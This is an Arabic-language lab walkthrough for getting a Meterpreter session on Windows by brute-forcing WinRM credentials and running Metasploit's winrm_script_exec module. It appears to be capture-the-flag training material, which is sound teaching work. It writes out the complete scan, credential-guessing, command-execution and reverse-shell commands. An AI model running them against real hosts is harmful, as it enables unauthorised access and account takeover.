🧪 المختبر 18: استغلال WinRM على Windows (باستخدام Metasploit)

🎯 الهدف الأساسي: الحصول على جلسة Meterpreter على نظام Windows عبر استغلال خدمة WinRM باستخدام Metasploit Framework.

🔧 الأدوات المستخدمة: nmap, crackmapexec, msfconsole, auxiliary/scanner/winrm/winrm_login, auxiliary/scanner/winrm/winrm_cmd, exploit/windows/winrm/winrm_script_exec.

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: الاستطلاع، الفحص، القوة الغاشمة، الاستغلال

  1. الفحص واكتشاف خدمة WinRM:

    • قم بإجراء فحص Nmap على الهدف لتحديد ما إذا كانت خدمة WinRM تعمل على المنفذ 5985.

    • الأمر:

      nmap -p 5985 <Target_IP>
    • الشرح: ستؤكد أن المنفذ 5985 مفتوح.

    • استخدام `crackmapexec` لتأكيد تشغيل WinRM واختبار الأوامر.
    • الأمر:

      crackmapexec winrm <Target_IP> -u administrator -p password -x "whoami"
    • الشرح: سيتصل crackmapexec بـ WinRM ويحاول تنفيذ الأمر.

  2. هجوم القوة الغاشمة على WinRM (باستخدام Metasploit):

    • ابدأ خدمة قاعدة بيانات PostgreSQL ثم قم بتشغيل Metasploit Console.

    • الأمر:

      msfconsole -q
    • استخدم وحدة auxiliary/scanner/winrm/winrm_login لتخمين بيانات اعتماد WinRM.

    • الأمر:

      use auxiliary/scanner/winrm/winrm_login
      set RHOSTS <Target_IP>
      set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
      set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
      set VERBOSE false
      exploit
    • الشرح: إذا نفذت هذه الأوامر بتجد بيانات اعتماد صالحة (مثلاً administrator:Tinkerbell).

  3. اختبار تنفيذ الأوامر (باستخدام Metasploit):

    • الأمر:

      use auxiliary/scanner/winrm/winrm_cmd
      set RHOSTS <Target_IP>
      set USERNAME administrator
      set PASSWORD Tinkerbell
      set CMD whoami
      exploit
    • الشرح: إذا نفذت هذه الأوامر، ستنفذ الوحدة الأمر whoami وتعرض المخرجات، مما يؤكد إمكانية تنفيذ الأوامر.

  4. الاستغلال للحصول على Meterpreter Shell:

    • المعلومة الذهبية 💡: استخدم وحدة exploit/windows/winrm/winrm_script_exec للحصول على جلسة Meterpreter.

    • الأمر:

      use exploit/windows/winrm/winrm_script_exec
      set RHOSTS 
      set USERNAME administrator
      set PASSWORD Tinkerbell
      set FORCE_VBS_CMD_STAGER true
      set LHOST <Your_Kali_IP>
      set LPORT 4444
      exploit
    • الشرح: إذا نفذت هذه الأوامر، ستقوم Metasploit برفع حمولة وتنفيذها، وستحصل على جلسة Meterpreter.

  5. جمع العلم (Flag):

    • الأمر: (داخل جلسة Meterpreter)

      getuid
      shell
      type C:\flag.txt
    • الشرح: إذا نفذت هذه الأوامر، ستؤكد امتيازاتك، وستعرض لك محتويات ملف flag.txt.

Last updated